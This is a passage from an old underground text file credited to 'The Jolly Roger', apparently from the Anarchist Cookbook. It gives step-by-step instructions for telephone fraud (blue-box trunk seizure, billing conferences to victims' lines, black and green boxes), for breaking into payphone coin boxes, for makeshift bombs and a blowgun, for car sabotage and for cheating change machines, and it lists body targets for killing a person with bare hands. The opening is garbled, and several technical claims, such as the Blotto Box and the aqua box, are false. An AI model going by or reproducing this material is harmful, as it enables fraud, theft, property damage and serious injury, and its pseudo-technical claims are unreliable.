-1001 (Los Angeles)
-1002
-1003 (Houston)
-2000 (?)
-2001
-2002
-2003
-3000
-3001
-3002
-3003 locations known them. 200x 300x definitely known. Rumor pattern repeats
itself proven.
Dialing: before, causes residence charged bills low!!! ways discovered PBX.
Incorporating loop. am sure more, four PBX: easiest method creating Simply
Alliance, input PBX outside alliance.
example be: 800-241-4911 answers tone. tone
Code: 1234
After tone, line. hear Box: rather simple starting procedure conference: of.
609-609-6099 hit 2600hz. fone hung up. ><beep><kerchunk> You have now 'seized' a
trunk. After this, switch to
multi-frequency and dial:
KP-0-700-456-x00x-ST
· KP = KP tone on Blue Box
· x = variable between 1 and 3
· ST = ST tone on Blue Box
The equipment now thinks that the operator has dialed Alliance from her
switchboard and the conference shall be billed there. Since Blue Boxing is such
a large topic, this is as far as I will go into it's
uses.
Billing to a loop:
A third method of receiving a free conference is by billing out to a loop. A
loop is 2 numbers that when two people call, they can talk to each other. You're
saying woop-tee-do right? Wrong! Loops
can be <very> useful to phreaks. First, dial alliance direct. After going
through the beginning procedure, which will be discussed later in this tutorial,
dial 0 and wait for an Alliance operator. When she
answers tell her you would like to bill the conference to such and such a
number. (A loop where your phriend is on the other side) She will then call that
number to receive voice verification. Of course
your phriend will be waiting and will accept the charges. Thus, the conference
is billed to the loop.
Billing to call forwarding:
When you dial a number that is call forwarded, it is first answered by the
original location, then forwarded. The original location will hang up if 2600hz
is received from only one end of the line.
Therefore, if you were to wait after the forwarded residence answered, you would
receive the original location's dial tone.
Example:
Dial 800-325-4067
The original residence would answer, then forward the call, a second type of
ringing would be heard. When this second residence answers simply wait until
they hang up. After about twenty seconds
you will then receive the original residence's dial tone since it heard 2600hz
from one end of the line. Simply dial Alliance from this point and the
conference will be billed to the original residence. These
are the four main ways to receive a free conference. I am sure
many more exist, but these four are quite handy themselves.
Logon Procedure:
Once Alliance answers you will hear a two-tone combination. This is their way of
saying 'How many people do you want on the conference dude?' Simply type in a
2-digit combination, depending on
what bridge of Alliance you are on, between 10 and 59. After this either hit '*'
to cancel the conference size and input another or hit '#' to continue. You are
now in Alliance Teleconferencing and are
only seconds away from having your own roaring conference going strong!!!
Dialing in Conferees:
To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.
npa = area code
pre = prefix
suff = suffix
If the number is busy, or if no one answers simply hit '*' and your call will be
aborted. But, if they do answer, hit the '#' key. This will add them to the
conference. Now commence dialing other
conferees.
Joining Your Conference:
To join your conference from control mode simply hit the '#' key. Within a
second or two you will be chatting with all your buddies. To go back into
control mode, simply hit the '#' key again.
Transferring Control:
To transfer control to another conferee, go into control mode, hit the #
6+1+npa+pre+suff of the conferee you wish to give control to. If after, you wish
to abort this transfer hit the '*' key.
NOTE: Transfer of control is often not available. When you receive a message
stating this, you simply cannot transfer control.
Muted Conferences:
To request a muted conference simply hit the 9 key. I am not exactly sure what a
muted conference is but it is probably a way to keep unwanted eavesdroppers from
listening in.
Dialing Alliance Operators:
Simply dial 0 as you would from any fone and wait for the operator to answer.
Ending Your Conference:
To end your conference all together, that is kick everyone including yourself
off, go into control mode and hit '*'...after a few seconds simply hang up. Your
conference is over.
Are Alliance Operators Dangerous?
No. Not in the least. The worst they can do to you while you are having a
conference is drop all conferees including yourself. This is in no way harmful,
just a little aggravating.
Alliance and Tracing:
Alliance can trace, as all citizens of the United States can. But this has to
all be pre-meditated and AT&T has to be called and it's really a large hassle,
therefore, it is almost never done. Alliance simply
does not want it known that teenagers are phucking them over. The only sort of
safety equipment Alliance has on-line is a simple pen register. This little
device simply records all the numbers of the
conferees dialed. No big deal. All Alliance can do is call up that persons
number, threaten and question. However, legally, they can do nothing because all
you did was answer your fone.
NOTE: Almost all instructions are told to the person in command by Alliance
recordings. A lot of this tutorial is just a listing of those commands plus
information gathered by either myself or the phellow
phreaks of the world!!!
38. Aqua Box Plans by The Jolly Roger
Every true phreaker lives in fear of the dreaded FBI 'Lock In Trace'. For a long
time, it was impossible to escape from the Lock In Trace. This box does offer an
escape route with simple directions to
it. This box is quite a simple concept, and almost any phreaker with basic
electronics knowledge can construct and use it.
The Lock In Trace
A lock in trace is a device used by the FBI to lock into the phone users
location so that he can not hang up while a trace is in progress. For those of
you who are not familiar with the concept of 'locking
in', then here's a brief description. The FBI can tap into a conversation, sort
of like a three-way call connection. Then, when they get there, they can plug
electricity into the phone line. All phone
connections are held open by a certain voltage of electricity. That is why you
sometimes get static and faint connections when you are calling far away,
because the electricity has trouble keeping the line
up. What the lock in trace does is cut into the line and generate that same
voltage straight into the lines. That way, when you try and hang up, voltage is
retained. Your phone will ring just like someone
was calling you even after you hang up. (If you have call waiting, you should
understand better about that, for call waiting intercepts the electricity and
makes a tone that means someone is going through
your line. Then, it is a matter of which voltage is higher. When you push down
the receiver, then it see-saws the electricity to the other side. When you have
a person on each line it is impossible to hang
up unless one or both of them will hang up. If you try to hang up, voltage is
retained, and your phone will ring. That should give you an understanding of how
calling works. Also, when electricity passes
through a certain point on your phone, the electricity causes a bell to ring, or
on some newer phones an electronic ring to sound.) So, in order to eliminate the
trace, you somehow must lower the
voltage level on your phone line. You should know that every time someone else
picks up the phone line, then the voltage does decrease a little. In the first
steps of planning this out, Xerox suggested
getting about a hundred phones all hooked into the same line that could all be
taken off the hook at the same time. That would greatly decrease the voltage
level. That is also why most three-way
connections that are using the bell service three way calling (which is only $3
a month) become quite faint after a while. By now, you should understand the
basic idea. You have to drain all of the power
out of the line so the voltage can not be kept up. Rather sudden draining of
power could quickly short out the FBI voltage machine, because it was only built
to sustain the exact voltage necessary to
keep the voltage out. For now, imagine this. One of the normal Radio Shack
generators that you can go pick up that one end of the cord that hooks into the
central box has a phone jack on it and the
other has an electrical plug. This way, you can "flash" voltage through the
line, but cannot drain it. So, some
modifications have to be done.
Materials
A BEOC (Basic Electrical Output Socket), like a small lamp-type connection,
where you just have a simple plug and wire that would plug into a light bulb.
One of cords mentioned above, if you can't
find one then construct your own... Same voltage connection, but the restrainer
must be built in (I.E. The central box) Two phone jacks (one for the modem, one
for if you are being traced to plug the
aqua box into) Some creativity and easy work.
Notice: No phones have to be destroyed/modified to make this box, so don't go
out and buy a new phone for it!
Procedure
All right, this is a very simple procedure. If you have the BEOC, it could drain
into anything: a radio, or whatever. The purpose of having that is you are going
to suck the voltage out from the phone line
into the electrical appliance so there would be no voltage left to lock you in
with.
1. Take the connection cord. Examine the plug at the end. It should have only
two prongs. If it has three, still, do not fear. Make sure the electrical
appliance is turned off unless you want to
become a crispy critter while making this thing. Most plugs will have a hard
plastic design on the top of them to prevent you from getting in at the
electrical wires inside. Well, remove it. If you want to
keep the plug (I don't see why...) then just cut the top off. When you look
inside, Low and Behold, you will see that at the base of the prongs there are a
few wires connecting in. Those wires conduct
the power into the appliance. So, you carefully unwrap those from the sides and
pull them out until they are about an inch ahead of the prongs. If you don't
want to keep the jack, then just rip the prongs
out. If you are, cover the prongs with insulation tape so they will not connect
with the wires when the power is being drained from the line.
2. Do the same thing with the prongs on the other plug, so you have the wires
evenly connected. Now, wrap the end of the wires around each other. If you
happen to have the other end of the
voltage cord hooked into the phone, stop reading now, you're too fucking stupid
to continue. After you've wrapped the wires around each other, then cover the
whole thing with the plugs with insulating
tape. Then, if you built your own control box or if you bought one, then cram
all the wires into it and reclose it. That box is your ticket out of this.
3. Re-check everything to make sure it's all in place. This is a pretty flimsy
connection, but on later models when you get more experienced at it then you can
solder away at it and form the
whole device into one big box, with some kind of cheap Mattel hand-held game
inside to be the power connector. In order to use it, just keep this box handy.
Plug it into the jack if you want, but it will
slightly lower the voltage so it isn't connected. When you plug it in, if you
see sparks, unplug it and restart the whole thing. But if it just seems fine
then leave it.
Use
----
Now, so you have the whole thing plugged in and all... Do not use this unless
the situation is desperate! When the trace has gone on, don't panic, unplug your
phone, and turn on the appliance that it
was hooked to. It will need energy to turn itself on, and here's a great
source... The voltage to keep a phone line open is pretty small and a simple
light bulb should drain it all in and probably short the
FBI computer at the same time.
39. Hindenberg Bomb by The Jolly Roger
Needed:
· 1 Balloon
· 1 Bottle
· 1 Liquid Plumber
· 1 Piece Aluminum foil
· 1 Length Fuse
Fill the bottle 3/4 full with Liquid Plumber and add a little piece of aluminum
foil to it. Put the balloon over the neck of the bottle until the balloon is
full of the resulting gas. This is highly flammable
hydrogen. Now tie the balloon. Now light the fuse, and let it rise. When the
fuse contacts the balloon, watch out!!!
40. How to Kill Someone with your Bare Hands by The Jolly Roger
This file will explain the basics of hand-to-hand combat, and will tell of the
best places to strike and kill an enemy. When engaged in hand-to-hand combat,
your life is always at stake. There is only one
purpose in combat, and that is to kill your enemy. Never face an enemy with the
idea of knocking him out. The chances are extremely good that he will kill YOU
instead. When a weapon is not
available, one must resort to the full use of his natural weapons. The natural
weapons are:
1. The knife edge of your hands.
2. Fingers folded at the second joint or knuckle.
3. The protruding knuckle of your second finger.
4. The heel of your hand.
5. Your boot
6. Elbows
7. Knees
8. Your Teeth.
Attacking is a primary factor. A fight was never won by defensive action. Attack
with all of your strength. At any point or any situation, some vulnerable point
on your enemies body will be open for
attack. Do this while screaming as screaming has two purposes.
1. To frighten and confuse your enemy.
2. To allow you to take a deep breath which, in turn, will put more oxygen in
your blood stream.
Your balance and balance of your enemy are two important factors; since, if you
succeed in making your enemy lose his balance, the chances are nine to one that
you can kill him in your next move.
The best over-all stance is where your feet are spread about shoulders width
apart, with your right foot about a foot ahead of the left. Both arms should be
bent at the elbows parallel to each other.
Stand on the balls of your feet and bend your waist slightly. Kind of like a
boxer's crouch. Employing a sudden movement or a scream or yell can throw your
enemy off-balance. There are many
vulnerable points of the body. We will cover them now:
Eyes: Use your fingers in a V-shape and attack in gouging motion.
Nose:(Extremely vulnerable) Strike with the knife edge of the hand along the
bridge, which will cause breakage, sharp pain, temporary blindness, and if the
blow is hard enough, death. Also, deliver a
blow with the heel of your hand in an upward motion, this will shove the bone up
into the brain causing death.
Adam's Apple: This spot is usually pretty well protected, but if you get the
chance, strike hard with the knife edge of your hand. This should sever the
wind-pipe, and then it's all over in a matter of
minutes.
Temple: There is a large artery up here, and if you hit it hard enough, it will
cause death. If you manage to knock your enemy down, kick him in the temple, and
he'll never get up again.
Back of the Neck: A rabbit punch, or blow delivered to the base of the neck can
easily break it, but to be safe, it is better to use the butt of a gun or some
other heavy blunt object.
Upper lip: A large network of nerves are located. These nerves are extremely
close to the skin. A sharp upward blow will cause extreme pain, and
unconsciousness.
Ears: Coming up from behind an enemy and cupping the hands in a clapping motion
over the victims ears can kill him immediately. The vibrations caused from the
clapping motion will burst his
eardrums, and cause internal bleeding in the brain.
Groin: A VERY vulnerable spot. If left open, get it with knee hard, and he'll
buckle over very fast.
Kidneys: A large nerve that branches off to the spinal cord comes very close to
the skin at the kidneys. A direct blow with the knife edge of your hand can
cause death.
There are many more ways to kill and injure an enemy, but these should work best
for the average person. This is meant only as information and I would not
recommend that you use this for a simple
High School Brawl. Use these methods only, in your opinion, if your life is in
danger. Any one of these methods could very easily kill or cause permanent
damage to someone. One more word of
caution, you should practice these moves before using them on a dummy, or a mock
battle with a friend. (You don't have to actually hit him to practice, just work
on accuracy.)
41. Phone Systems Tutorial III by The Jolly Roger
Preface:
This article will focus primarily on the standard western electric single- Slot
coin telephone (aka fortress fone) which can be divided into 3 types:
· dial-tone first (dtf)
· coin-first (cf): (i.e., it wants your $ before you receive a dial tone)
· dial post-pay service (pp): you payafter the party answers
Depositing coins (slugs):
Once you have deposited your slug into a fortress, it is subjected to a Gamut of
tests. The first obstacle for a slug is the magnetic trap. This will stop any
light-weight magnetic slugs and coins. If it
passes this, the slug is then classified as a nickel, dime, or Quarter. Each
slug is then checked for appropriate size and weight. If These tests are passed,
it will then travel through a nickel, dime, or
quarter Magnet as appropriate. These magnets set up an eddy current effect which
Causes coins of the appropriate characteristics to slow down so they Will follow
the correct trajectory. If all goes
well, the coin will follow the Correct path (such as bouncing off of the nickel
anvil) where it will Hopefully fall into the narrow accepted coin channel. The
rather elaborate tests that are performed as the
coin travels down the Coin chute will stop most slugs and other undesirable
coins, such as Pennies, which must then be retrieved using the coin release
lever. If the slug miraculously survives the gamut,
it will then strike the Appropriate totalizer arm causing a ratchet wheel to
rotate once for every 5-cent increment (e.g., a quarter will cause it to rotate
5 times). The totalizer then causes the coin signal
oscillator to readout a dual-frequency signal indicating the value deposited to
acts (a computer) or the Tsps operator. These are the same tones used by phreaks
in the infamous red boxes. For a
quarter, 5 beep tones are outpulsed at 12-17 pulses per second (pps). A dime
causes 2 beep tones at 5 - 8½ pps while a nickel causes one beep tone at 5 - 8½
pps. A beep consists of 2 tones: 2200
+ 1700 hz. A relay in the fortress called the "B Relay" (yes, there is also an
'a relay') places a capacitor across the speech circuit during totalizer readout
to prevent the "customer" from hearing the red
box tones. In older 3 slot phones: one bell (1050-1100 hz) for a nickel, two
bells for a dime, and one gong (800 hz) for a quarter are used instead of the
modern dual-frequency tones.
TSPS & ACTS
While fortresses are connected to the co of the area, all transactions are
handled via the traffic service position system (tsps). In areas that do not
have acts, all calls that require operator assistance,
such as calling card and collect, are automatically routed to a tsps operator
position. In an effort to automate fortress service, a computer system known as
automated coin toll service (acts) has been
implemented in many areas. Acts listens to the red box signals from the fones
and takes appropriate action. It is acts which says, "two dollars please (pause)
please deposit two dollars for the next ten
seconds" (and other variations). Also, if you talk for more than three minutes
and then hang-up, acts will call back and demand your money. Acts is also
responsible for automated calling card service.
Acts also provide trouble diagnosis for craftspeople (repairmen specializing in
fortresses). For example, there is a coin test which is great for tuning up red
boxes. In many areas this test can be activated
by dialing 09591230 at a fortress (thanks to karl marx for this information).
Once activated it will request that you deposit various coins. It will then
identify the coin and outpulse the appropriate red
box signal. The coins are usually returned when you hang up. To make sure that
there is actually money in the fone, the co initiates a "ground test" at various
times to determine if a coin is actually in the
fone. This is why you must deposit at least a nickel in order to use a red box!
Green Boxes:
Paying the initial rate in order to use a red box (on certain fortresses) left a
sour taste in many red boxer's mouths thus the green box was invented. The green
box generates useful tones such as coin
collect, coin return, and ringback. These are the tones that acts or the tsps
operator would send to The co when appropriate. Unfortunately, the green box
cannot be used at a fortress station but it must
be used by the called party.
Here are the tones:
Coin Collect 700 + 1100 Hz
Coin Return 1100 + 1700 Hz
Ringback 700 + 1700 Hz
Before the called party sends any of these tones, an operator released signal
should be sent to alert the MF detectors at the co. This can be accomplished by
sending 900 + 1500 hz or a single 2600 hz
wink (90 ms) followed by a 60 ms gap and then the appropriate signal for at
least 900 Ms.
Also, do not forget that the initial rate is collected shortly before the 3
minute period is up. Incidentally, once the above MF tones for collecting and
returning coins reach the co, they are converted into
an appropriate dc pulse (-130 volts for return & +130 volts for collect). This
pulse is then sent down the tip to the fortress. This causes the coin relay to
either return or collect the coins. The alleged
"t-network" takes advantage of this information. When a pulse for coin collect
(+130 vdc) is sent down the line, it must be grounded somewhere. This is usually
either the yellow or black wire. Thus, if
the wires are exposed, these wires can be cut to prevent the pulse from being
grounded. When the three minute initial period is almost up, make sure that the
black & yellow wires are severed; then
hang up, wait about 15 seconds in case of a second pulse, reconnect the wires,
pick up the fone, hang up again, and if all goes well it should be "jackpot"
time.
Physical Attack:
A typical fortress weighs roughly 50 lbs. With an empty coin box. Most of this
is accounted for in the armor plating. Why all the security? Well, Bell
contributes it to the following: "social changes during
the 1960's made the multislot coin station a prime target for: vandalism, strong
arm robbery, fraud, and theft of service. This brought about the introduction of
the more rugged single slot coin station and
a new environment for coin service." As for picking the lock, I will quote Mr.
Phelps: "We often fantasize about 'picking the lock' or 'getting a master key.'
Well, you can forget about it. I don't like to
discourage people, but it will save you from wasting a lot of our time--time
which can be put to better use (heh, heh)." As for physical attack, the coin
plate is secured on all four side by hardened steel
bolts which pass through two
slots each. These bolts are in turn interlocked by the main lock. One phreak I
know did manage to take one of the 'mothers' home (which was attached to a piece
of plywood at a construction site;
otherwise, the permanent ones are a bitch to detach from the wall!). It took him
almost ten hours to open the coin box using a power drill, sledge hammers, and
crowbars (which was empty -- perhaps
next time, he will deposit a coin first to hear if it slushes down nicely or
hits the empty bottom with a clunk.)
Taking the fone offers a higher margin of success. Although this may be
difficult often requiring brute force and there has been several cases of back
axles being lost trying to take down a fone! A quick
and dirty way to open the coin box is by using a shotgun. In Detroit, after
ecologists cleaned out a municipal pond, they found 168 coin phones rifled. In
colder areas, such as Canada, some shrewd
people tape up the fones using duct tape, pour in water, and come back the next
day when the water will have froze thus expanding and cracking the fone open. In
one case, "unauthorized coin
collectors" where caught when they brought $6,000 in change to a bank and the
bank became suspicious... At any rate, the main lock is an eight level tumbler
located on the right side of the coin box.
This lock has 390,625 possible positions (5 ^ 8, since there are 8 tumblers each
with 5 possible positions) thus it is highly pick resistant! The lock is held in
place by 4 screws. If there is sufficient
clearance to the right of the fone, it is conceivable to punch out the screws
using the drilling pattern below (provided by Alexander Muddy in tap #32):
!! ^
!! !
! 1- 3/16 " !! !
!<--- --->!! 1-½"
-------------------- !
! ! !! ! !
! (+) (+)-! -----------
---! !! ! ^
! ! !! ! !
! ! (Z) !! ! !
! ! !! ! 2-3/16"
---! !! ! !
! (+) (+) ! !
! !! ! !
-------------------- -----------
!!
!!
(Z) KEYHOLE (+) SCREWS
!!
After this is accomplished, the lock can be pushed backwards disengaging the
lock from the cover plate. The four bolts of the cover plate can then be
retracted by turning the bolt works with a simple
key in the shape of the hole on the coin plate (see diagram below). Of course,
there are other methods and drilling patterns.
_
! !
( )
!_!
[ROUGHLY]
DIAGRAM OF COVER PLATE KEYHOLE
The top cover uses a similar, but not as strong locking method with the keyhole
depicted above on the top left hide and a regular lock (probably tumbler also)
on the top right-hand side. It is interesting
to experiment with the coin chute and the fortresses own "red box" which bell
didn't have the balls to color red.
Miscellaneous:
In a few areas (rural & Canada), post-pay service exists. With this type of
service, the mouthpiece is cut off until the caller deposits money when the
called party answers. This also allows for free calls
to weather and other dial-it services! Recently, 2600 magazine announced the
clear box which consists of a telephone pickup coil and a small amp. It is based
on the principal that the receiver is also a
weak transmitter and that by amplifying your signal you can talk via the
transmitter thus avoiding costly telephone charges! Most fortresses are found in
the 9xxx area. Under former bell areas, they
usually start at 98xx (right below the 99xx official series) and move downward.
Since the line, not the fone, determines whether or not a deposit must be made,
dtf & charge-a-call fones make great extensions! Finally, fortress fones allow
for a new hobby--instruction plate
collecting. All that is required is a flat-head screwdriver and a pair of
needle-nose pliers. Simply use the screwdriver to lift underneath the plate so
that you can grab it with the pliers and yank
downwards. I would suggest covering the tips of the pliers with electrical tape
to prevent scratching. Ten cent plates are definitely becoming a "rarity!"
Fortress security:
While a lonely fortress may seem the perfect target, beware! The gestapo has
been known to stake out fortresses for as long as 6 years according to the grass
roots quarterly. To avoid any problems,
do not use the same fones repeatedly for boxing, calling cards, & other
experiments. The Telco knows how much money should be in the coin box and when
its not there they tend to get perturbed
(Read: Pissed Off).
42. Black Box Plans by The Jolly Roger
Introduction:
At any given time, the voltage running through your phone is about 20 Volts.
When someone calls you, this voltage goes up to 48 Volts and rings the bell.
When you answer, the voltage goes down to
about 10 Volts. The phone company pays attention to this. When the voltage drops
to 10, they start billing the person who called you.
Function:
The Black Box keeps the voltage going through your phone at 36 Volts, so that it
never reaches 10 Volts. The phone company is thus fooled into thinking you never
answered the phone and does not
bill the caller. However, after about a half hour the phone company will get
suspicious and disconnect your line for about 10 seconds.
Materials:
· 1 1.8K ½ Watt Resistor
· 1 1½V LED
· 1 SPST Switch
Procedure:
1. Open your phone by loosening the two screws on the bottom and lifting the
case off.
2. There should be three wires: Red, Green, and Yellow. We'll be working with
the Red Wire.
3. Connect the following in parallel:
· The Resistor and LED.
· The SPST Switch.
In other words, you should end up with this:
(Red Wire)
!---/\/\/\--O--!
(Line)-----! !-----(Phone)
!-----_/_------!
/\/\/\ = Resistor
O = LED
_/_ = SPST
Use:
The SPST Switch is the On/Off Switch of the Black Box. When the box is off, your
phone behaves normally. When the box is on and your phone rings, the LED
flashes. When you answer, the LED
stays on and the voltage is kept at 36V, so the calling party doesn't get
charged. When the box is on, you will not get a dial tone and thus cannot make
calls. Also remember that calls are limited to half
an hour.
PS Due to new Fone Company switching systems & the like, this may or may not
work in your area. If you live in Bumfuck Kentucky, then try this out. I make no
guarantees! (I never do...)
43. The Infamous Blotto Box!! by The Jolly Roger
(I bet that no one has the balls to build this one!)
Finally, it is here! What was first conceived as a joke to fool the innocent
phreakers around America has finally been conceived! Well, for you people who
are unenlightened about the Blotto Box, here is a brief summery of a legend.
The Blotto Box
For years now every pirate has dreamed of the Blotto Box. It was at first made
as a joke to mock more ignorant people into thinking that the function of it
actually was possible. Well, if you are The
Voltage Master, it is possible. Originally conceived by King Blotto of much
fame, the Blotto Box is finally available to the public.
NOTE: Jolly Roger can not be responsible for the information disclosed in the
file! This file is strictly for informational purposes and should not be
actually built and used! Usage of this electronical
impulse machine could have the severe results listed below and could result in
high federal prosecution! Again, I TAKE NO RESPONSIBILITY! All right, now that
that is cleared up, here is the basis
of the box and it's function.
The Blotto Box is every phreaks dream... you could hold AT&T down on its knee's
with this device. Because, quite simply, it can turn off the phone lines
everywhere. Nothing. Blotto. No calls will be
allowed out of an area code, and no calls will be allowed in. No calls can be
made inside it for that matter. As long as the switching system stays the same,
this box will not stop at a mere area code. It
will stop at nothing. The electrical impulses that emit from this box will open
every line. Every line will ring and ring and ring... the voltage will never be
cut off until the box/generator is stopped. This is
no 200 volt job, here. We are talking GENERATOR. Every phone line will continue
to ring, and
people close to the box may be electrocuted if they pick up the phone. But, the
Blotto Box can be stopped by merely cutting of the line or generator. If they
are cut off then nothing will emit any longer.
It will take a while for the box to calm back down again, but that is merely a
superficial aftereffect. Once again: Construction and use of this box is not
advised! The Blotto Box will continue as long as
there is electricity to continue with. OK, that is what it does, now, here are
some interesting things for you to do with it...
Blotto Functions/Installing
Once you have installed your Blotto, there is no turning back. The following are
the instructions for construction and use of this box. Please read and heed all
warnings in the above section before you
attempt to construct this box.
Materials:
· A Honda portable generator or a main power outlet like in a stadium or some
such place.
· 400 volt rated coupler that splices a female plug into a phone line jack.
· A meter of voltage to attach to the box itself.
· A green base (i.e. one of the nice boxes about 3' by 4' that you see around in
your neighborhood. They are the main switch boards and would be a more effective
line to start with or a
regular phone jack (not your own, and not in your area code!)
· A soldering iron and much solder.
· A remote control or long wooden pole.
Now. You must have guessed the construction from that. If not, here goes, I will
explain in detail. Take the Honda Portable Generator and all of the other listed
equipment and go out and hunt for a
green base. Make sure it is one on the ground or hanging at head level from a
pole, not the huge ones at the top of telephone poles. Open it up with anything
convenient, if you are two feeble then fuck,
don't try this. Take a look inside... you are hunting for color-coordinating
lines of green and red. Now, take out your radio shack cord and rip the meter
thing off. Replace it with the voltage meter
about. A good level to set the voltage to is about 1000 volts. Now, attach the
voltage meter to the cord and set the limit for one thousand. Plug the other end
of the cord into the generator. Take the
phone jack and splice the jack part off. Open it up and match the red and green
wires with the other red and green wires.
NOTE: If you just had the generator on and have done this in the correct order,
you will be a crispy critter. Keep the generator off until you plan to start it
up. Now, solder those lines together carefully.
Wrap duck tape or insulation tape around all of the wires. Now, place the remote
control right on to the startup of the generator. If you have the long pole,
make sure it is very long and stand back as
far away as you can get and reach the pole over.
NOTICE: If you are going right along with this without reading the file first,
you still realize now that your area code is about to become null! Then, getting
back, twitch the pole/remote control and run
for your damn life. Anywhere, just get away from it. It will be generating so
much electricity that if you stand to close you will kill yourself. The
generator will smoke, etc. but will not stop. You are now
killing your area code, because all of that energy is spreading through all of
the phone lines around you in every direction.
Have a nice day!
The Blotto Box: Aftermath
Well, that is the plans for the most devastating and ultimately deadly
box ever created. My hat goes off to: King Blotto (for the original idea).
44. Blowgun by The Jolly Roger
In this article I shall attempt to explain the use and manufacture of a powerful
blow-gun and making darts for the gun. The possession of the blow gun described
in this article IS a felony. So be careful
where you use it. I don't want to get you all busted.
Needed:
1. Several strands of yarn (About 2 inches a-piece).
2. A regular pencil.
3. A 2 ¼ inch long needle (hopefully with a beaded head. If not obtainable, wrap
tape around end of needle.
4. ¼ foot pipe. (PVC or Aluminum) Half a inch in diameter.
Constructing the dart:
1. Carefully twist and pull the metal part (Along with eraser) of the pencil
till it comes off.
2. Take Pin and start putting about 5-7 Strands of yarn on the pin. Then push
them up to the top of the pin. But not over the head of the pin (or the tape).
3. Push pin through the hollow part of the head where the pencil was before.
4. That should for a nice looking dart. (see illustration)
#####
>>>>>-----/ # is the yarn
> is the head of the pencil
- is the pin it-self
/ is the head of the pin
Using the Darts:
1. Now take the finished dart and insert it in the tube (if it is too small put
on more yarn.)
2. Aim the tube at a door, wall, sister, ect.
3. Blow on the end of the pipe.
4. Sometimes the end of the pipe may be sharp. When this happens I suggest you
wrap it with some black electrician tape. It should feel a lot better.
45. Brown Box Plans by The Jolly Roger
This is a fairly simple mod that can be made to any phone. All it does is allow
you to take any two lines in your house and create a party line. So far I have
not heard of anyone who has any problems
with it. There is one thing that you will notice when you are one of the two
people who is called by a person with a brown box. The other person will sound a
little bit faint. I could overcome this with
some amplifiers but then there wouldn't be very many of these made [Why not?]. I
think the convenience of having two people on the line at once will make up for
any minor volume loss.
Here is the diagram:
KEY:___________________________________
| PART | SYMBOL |
|---------------------------------|
| BLACK WIRE | * |
| YELLOW WIRE | = |
| RED WIRE | + |
| GREEN WIRE | - |
| SPDT SWITCH | _/_ |
| _/_ |
| VERTICAL WIRE | | |
| HORIZONTAL WIRE | _ |
-----------------------------------
* = - +
* = - +
* = - +
* = - +
* = - +
* ==_/_- +
*******_/_++++++
| |
| |
| |
| |
| |
| |
|_____PHONE____|
46. Calcium Carbide Bomb by The Jolly Roger
This is EXTREMELY DANGEROUS. Exercise extreme caution.... Obtain some calcium
carbide. This is the stuff that is used in carbide lamps and can be found at
nearly any hardware store. Take a
few pieces of this stuff (it looks like gravel) and put it in a glass jar with
some water. Put a lid on tightly. The carbide will react with the water to
produce acetylene carbonate which is similar to the gas
used in cutting torches. Eventually the glass with explode from internal
pressure. If you leave a burning rag nearby, you will get a nice fireball!
47. More Ways to Send a Car to Hell by The Jolly Roger
Due to a lot of compliments, I have written an update to file #14. I have left
the original intact. This expands upon the original idea, and could be well
called a sequel.
How to have phun with someone else's car. If you really detest someone, and I
mean detest, here's a few tips on what to do in your spare time. Move the
windshield wiper blades, and insert and glue
tacks. The tacks make lovely designs. If your "friend" goes to school with you,
Just before he comes out of school. Light a lighter and then put it directly
underneath his car door handle.
Wait...Leave...Listen. When you hear a loud "shit!", you know he made it to his
car in time. Remove his muffler and pour approximately 1 Cup of gas in it. Put
the muffler back, then wait till their car
starts. Then you have a cigarette lighter. A 30 foot long cigarette lighter.
This one is effective, and any fool can do it. Remove the top air filter. That's
it! Or a oldie but goodie: sugar in the gas tank.
Stuff rags soaked in gas up the exhaust pipe. Then you wonder why your "friend"
has trouble with his/her lungs. Here's one that takes time and many friends.
Take his/her car then break into their
house and reassemble it, in their living or bedroom. Phun eh? If you're into
engines, say eeni mine moe and point to something and remove it. They wonder why
something doesn't work. There are so
many others, but the real good juicy ones come by thinking hard.
48. Ripping off Change Machines by The Jolly Roger
Have you ever seen one of those really big changer machines in airports
Laundromats or arcades that dispense change when you put in your 1 or 5 dollar
bill? Well then, here is an article for you.
1. Find the type of change machine that you slide in your bill length wise, not
the type where you put the bill in a tray and then slide the tray in!!!
2. After finding the right machine, get a $1 or $5 bill. Start crumpling up into
a ball. Then smooth out the bill, now it should have a very wrinkly surface.
3. Now the hard part. You must tear a notch in the bill on the left side about ½
inch below the little 1 dollar symbol (See Figure).
4. If you have done all of this right then take the bill and go out the machine.
Put the bill in the machine and wait. What should happen is: when you put your
bill in the machine it thinks
everything is fine. When it gets to the part of the bill with the notch cut out,
the machine will reject the bill and (if you have done it right) give you the
change at the same time!!! So, you end up getting
your bill back, plus the change!! It might take a little practice, but once you
get the hang of it, you can get a lot of money!
\-----Make notch here. About ½" down from the 1.
49. Clear Box Plans by The Jolly Roger
The clear box is a new device which has just been invented that can be used
throughout Canada and rural United States. The clear box works on "PostPay"
payphones (fortress fones). Those are the
payphones that don't require payment until after the connection is established.
You pick up the fone, get a dial tone, dial your number, and then insert your
money after the person answers. If you don't
deposit the money then you can not speak to the person on the other end because
your mouth piece is cut off but not the ear-piece. (obviously these phones are
nice for free calls to weather or time or
other such recordings). All you must do is to go to your nearby Radio Shack, or
electronics store, and get a four-transistor amplifier and a telephone suction
cup induction pick-up. The induction
pick-up would be hooked up as it normally would to record a conversation, except
that it would be plugged into the output of the amplifier and a microphone would
be hooked to the input. So when
the party that is being called answers, the caller could speak through the
little microphone instead. His voice then goes through the amplifier and out the
induction coil, and into the back of the receiver
where it would then be broadcast through the phone lines and the other party
would be able to hear the caller. The Clear Box thus 'clears up' the problem of
not being heard. Luckily, the line will not be
cut-off after a certain amount of time because it will wait forever for the
coins to be put in. The biggest advantage for all of us about this new clear box
is the fact that this type of payphone will most
likely become very common. Due to a few things: 1st, it is a cheap way of
getting the DTF, dial-tone-first service, 2nd, it doesn't require any special
equipment, (for the phone company) This payphone
will work on any phone line. Usually a payphone line is different, but this is a
regular phone line and it is set up so the phone does all the charging, not the
company.
50. CNA List by The Jolly Roger
NPA TEL NUMBER NPA TEL NUMBER NPA TEL NUMBER
201 201-676-7070 415 415-543-6374 709 *** NONE ***
202 304-343-7016 416 416-443-0542 712 402-580-2255
203 203-789-6815 417 314-721-6626 713 713-861-7194
204 204-949-0900 418 514-725-2491 714 818-501-7251
205 205-988-7000 419 614-464-0123 715 608-252-6932
206 206-382-5124 501 405-236-6121 716 518-471-8111
207 617-787-5300 502 502-583-2861 717 412-633-5600
208 303-293-8777 503 206-382-5124 718 518-471-8111
209 415-543-2861 504 504-245-5330 801 303-293-8777
212 518-471-8111 505 303-293-8777 802 617-787-5300
